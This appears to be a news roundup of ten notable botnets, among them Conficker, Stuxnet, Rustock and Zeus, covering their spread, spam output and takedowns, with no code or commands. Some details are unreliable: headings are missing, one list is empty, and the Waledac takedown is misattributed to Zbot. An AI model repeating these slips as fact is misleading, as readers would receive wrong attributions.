Botnets: Trouble From A To Zbot

So Many Botnets, So Litte Time

It seems like you can't turn on your computer without reading about a new botnet that's rapidly infecting users around the world. Botnets, a network of compromised computers controlled by a command and control server, have gained notoriety in recent years, in part, because they're one of the easiest and most efficient ways for cyber criminals to distribute malware.

Crimeware kits make botnet creation a cinch and organized crime gangs are now in the business of renting out botnets to low level cyber hackers. Plus, botnets are nearly impossible to stop once they gain momentum.

Subsequently, we'll likely see even more botnets invade the security landscape over the next 12 months.

Here are 10 of the botnet threats to watch.


All botnets have some kind of calling card. The Bredolab botnet was notorious for sending out spyware, which allowed hackers to capture bank login credentials and other sensitive information from compromised computers. So far, the botnet has infected an estimated 30 million computers worldwide since it first surfaced in July of 2009.

Altogether, the Bredolab botnet was capable of infecting up to 3 million computers per month, responsible for sending out 3.6 billion spam e-mails were sent out daily containing the Bredolab malware, according to the Dutch High Tech Crime Team.

Last month, Dutch police and net security organizations dismantled 143 of the command and control servers associated with the Bredolab botnet, and disconnecting it from its Netherlands-based LeaseWeb, which hosted Bredolab servers on its IP space.


The infamous Conficker botnet rocked the world in 2009, spreading rapidly and infecting millions of users through a variety of attack vectors ranging from brute force password guessing to USB sticks.

The first versions, Conficker versions A and B, rapidly propelled the malware around the globe. One of the worm's biggest distinguishing features was its ability to patch its own vulnerability on the machines that it infected, possibly to prevent the machine from becoming compromised by competing malware.

While Version C didn't have A and B's distribution features, it touted numerous defensive measures designed to evade detection and removal by disabling Windows Automatic Updates and Windows Security Center. Version C also blocked access to several security vendors' Websites and rendered numerous antivirus products useless, while cranking up the number of domains it could check for updates.


The Gumblar botnet was first detected in March 2009, and had its heyday that same year, at one point surpassing Conficker in terms of infection rates.

Since then, Gumblar has spread rapidly, becoming one of the biggest threats on the Internet by exploiting Web browsers and browser plugins, such as Adobe Acrobat, Reader and Flash Player. The malware attack that ensues infects users via malicious PDF and Flash files, which in turn, exploits security flaws in the software that handles them. Victims are automatically infected without any user intervention.

And because it targets the Web browser on a PC, Gumblar is responsible for compromising numerous legitimate Web sites with embedded attack code, such as and, as well as searches the victim's system for FTP credentials that can be used to compromise additional Web sites.


The botnet was first detected earlier this year after infecting more than 74,000 PCs around the world.

Security experts believe that unlike other botnets designed to generate profits, the hackers behind Kneber aimed to make their money by renting out the botnet to cyber crime organizations and rogue governments.

Targets have included around 2,411 companies, including Paramount Pictures and Juniper Networks.

Meanwhile, the botnet authors have even managed to poison search engine results, so that many links high on the Google search pages lead to malware sites. According to a Symantec Security Response blog, the highest ranked page result on Google using "Kneber" search related terms led to a site hosting rogue antivirus software.


This one has been around since 2007. While it hasn't received as much media attention as Conficker or Storm, it reportedly holds its place as the second largest spam botnet in the world, sending approximately 7.7 billion e-mails per day, according to MessageLabs.

But its lack of notoriety is no fluke. In fact cyber criminals have gone to great lengths to keep this one under the radar, according to a Trend Micro report. For one, Pushdo authors have masked different variants of the malware, many of which come up as "generic detections." In addition, almost all Pushdo components reside in memory, making detection even more difficult. Plus, the botnet does not contain any means of self replication, while its owners frequently update the botnet's code and functions.


Once responsible for sending out 20 percent of the world's spam, Storm dominated the security threat landscape, bombarding e-mail users with malware and spam campaign. The Storm botnet has since been quelled, in part, by the proliferation of sophisticated new security tools, rendered defunct in 2008.

However, in recent months, Storm has been attempting to make a comeback, infecting PCs with a downloader Trojan that installs malware and fake anti-virus software onto a victim's machine.

Once the malware infects a user's computer, it connects with the spam bot server, which in turn, responds with required instructions for creating and sending massive amounts of spam e-mails from e-mail templates.

Some of the biggest Storm-distributed spam campaigns include online pharmacy, dating, celebrity scandals, or impotency related spam.


What separates the Stuxnet worm from other previous viruses is its "search and destroy" capabilities, which are specifically created to target industrial facilities such as chemical manufacturing and power plants using Supervisory Control and Data Acquisition (SCADA) systems. Specifically, the Stuxnet worm possesses the ability to modify Programmable Logic Controllers, devices that control the machines at power plants and other industrial facilities.

Stuxnet made headlines by infecting computers at Iran's Bushehr nuclear power plant, indicated by traces of code on Siemens industrial software systems that control operations at the facility. The attack prompted the U.S. to launch a coordinated cyber attack simulation in an effort to test the nation's cyber defenses against an all out cyber war.


Rustock has also come out of the shadows to pummel users with spam -- about 39 percent of global spam according to Symantec reports.

Rustock is most famous for its spam campaigns soliciting cheap and bogus medications through the Canadian Pharmacy, an internet pharmacy soliciting Viagra, Cialis, Lipitor and other commonly prescribed medications.

But unlike its counterparts, this botnet has a secret survival mechanism -- the spam its sends is encrypted. Rustock’s encrypts up to 77 percent of its spam with now the Transport Layer Security, a successor of the Secure Socket Layer, usually reserved for emails.

Some experts think that Rustock's latest encryption feature is meant to protect the botnet’s command and control layer from being shut down. The spam botnet was knocked offline when McColo was shut down in 2008. The botnet eventually returned, albeit weakened, and at a great price to bot herders.


The Waledac botnet, one of the ten largest networks of compromised computers on the Internet, earned its reputation by propelling spam and fake Web site campaigns.

Waledac authors propagate the malware by launching deliberate campaigns in the form of spam or spoofing Web sites, which often relies on some kind of social engineering trickery.

In recent months Microsoft, and other members of the security and academic communities, have made a concerted effort to thwart the botnet by obtaining permission from a Virginia court to disconnect 277 Internet domains connected to Zbot command and control center.

Prior to the domain takedown, Microsoft identified around 651 million spam messages directed at Hotmail alone by the Waledac botnet, while estimating that the botnet was responsible for sending about 1.5 billion spam messages per day.


As one of the most established botnets circulating the Web, Zbot, also known as the Zeus botnet, has thus far infected millions of users and doesn't appear to be stopping any time soon.

So called the "King of Bots," Zeus is particularly lucrative due to the fact is specifically targets banks, and other high dollar financial institutions.

And that fact is not lost on spammers. In fact, Zbot has experienced exponential growth in part, because of the pervasiveness of construction kits, which are on sale and widely available to the hacker community. According to a Kaspersky Lab report, Zeus has become one of the most commonly used and best-selling spy programs on the online black market.

As a testament to its popularity, the notorious banking botnet was recently used by an international cyber crime organization to steal around $70 million dollars from U.S. banks.